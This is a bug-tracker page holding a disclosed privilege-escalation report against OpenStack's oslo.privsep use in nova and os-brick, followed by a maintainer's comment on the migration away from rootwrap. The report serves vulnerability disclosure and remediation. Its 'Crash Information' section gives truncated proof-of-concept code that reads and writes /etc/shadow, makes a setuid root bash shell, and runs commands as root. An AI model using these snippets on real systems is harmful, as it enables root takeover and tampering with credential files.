Lax rulesets leading to privilege escalation vulnerabilities
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
OpenStack Compute (nova) |
Triaged
|
Medium
|
Unassigned | ||
OpenStack Security Advisory |
Won't Fix
|
Undecided
|
Unassigned | ||
os-brick |
New
|
Undecided
|
Unassigned | ||
oslo.privsep |
Triaged
|
Undecided
|
Unassigned |
Bug Description
[OpenStack's vulnerability managers received the following report via encrypted E-mail]
### Summary
A privilege escalation vulnerability exists in the oslo.privsep functionality of OpenStack git master 05194e7618 and prior. Overly permissive functionality within tools leveraging this library within a container can lead increased privileges.
### Confirmed Vulnerable Versions
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
OpenStack git master 05194e7618
### Product URLs
OpenStack - [https:/
### CVSSv3 Score
8.8 - CVSS:3.
### CWE
CWE-269 - Improper Privilege Management
### Details
OpenStack contains a number of tools, libraries, and services for providing simplified, powerful, and scalable cloud based applications.
OpenStack's [oslo.privsep](https:/
The oslo.privsep [design documents](https:/
Privileged functions must be as simple, specialized and narrow as possible, so as to prevent further escalation. In this example,
update_
it could be used to overwrite any file in the filesystem, allowing easy escalation to root rights. That would defeat the whole purpose of oslo.privsep.
...
Provided the unprivileged<
Two modules were observed to have functions that were overly broad and allowed for trivial escalation to root. The `nova` [module](https:/
Just in case it wasn't clear, this is a massive security back-door. [these wrappers] allow any command to be run as the privileged user (default "root").
This is intended only as an expedient transition and should be removed ASAP.
Either of the above modules are sufficient to achieve privilege escalation to root. Other modules within OpenStack were not audited, but it is possible that similar issues exist elsewhere in the codebase.
### Crash Information
###### Method 1 (nova)
from nova.privsep.path import *
from oslo_config.cfg import CONF
CONF.
# Read /etc/shadow
last_
# Write to /etc/shadow
writefile(
# Get a root shell
os.system("cp /bin/bash /tmp/bash")
chown(
chmod(
os.
bash-5.1#
###### Method 2 (os_brick)
from os_brick.
from oslo_config.cfg import CONF
import shlex # helpful for multi-arg commands
CONF.
execute_
('uid=0(root) gid=0(root) groups=0(root)\n', '')
### Mitigation
Privileged functions in the `nova` and `os_brick` modules of OpenStack should be rewritten to be as specialized and narrowly tailored as possible; e.g. `chmod(path, mode)` should be replaced with a function that only applies pre-defined permissions on one or more pre-defined files.
Suggest auditing other modules that use oslo.privsep to identify similar issues.
### Credit
Keane O'Kelley of Cisco ASIG
Changed in ossa: | |
status: | New → Incomplete |
Since this report concerns a possible security risk, an incomplete
security advisory task has been added while the core security
reviewers for the affected project or projects confirm the bug and
discuss the scope of any vulnerability along with potential
solutions.
For a bit of OpenStack background, the migration from our old "rootwrap" privilege escalation mechanism to oslo.privsep is ongoing. One of the early stepping stones projects took in order to be able to drop use of rootwrap was to port their extremely loose (more or less root-equivalent) sudoers rules to similarly unsafe privsep policies, with the intention of eventually replacing them with more fine-grained policies. I think it's safe to say many if not most OpenStack services are still effectively relying on having unrestricted system-wide root permissions. I also don't think we'll be able to safely backport any fixes (i.e. completion of the many-years-long rootwrap to privsep migration effort) to maintained stable branches, making this a class B1 or B2 in our report taxonomy: https:/ /security. openstack. org/vmt- process. html#report- taxonomy
It's my opinion that we should switch this to a public security hardening bug and, if relevant, mark it as a duplicate of any existing bug reports about the incomplete state of privsep adoption, but I'm eager to hear from developers in the affected projects as to their position on this. Thanks!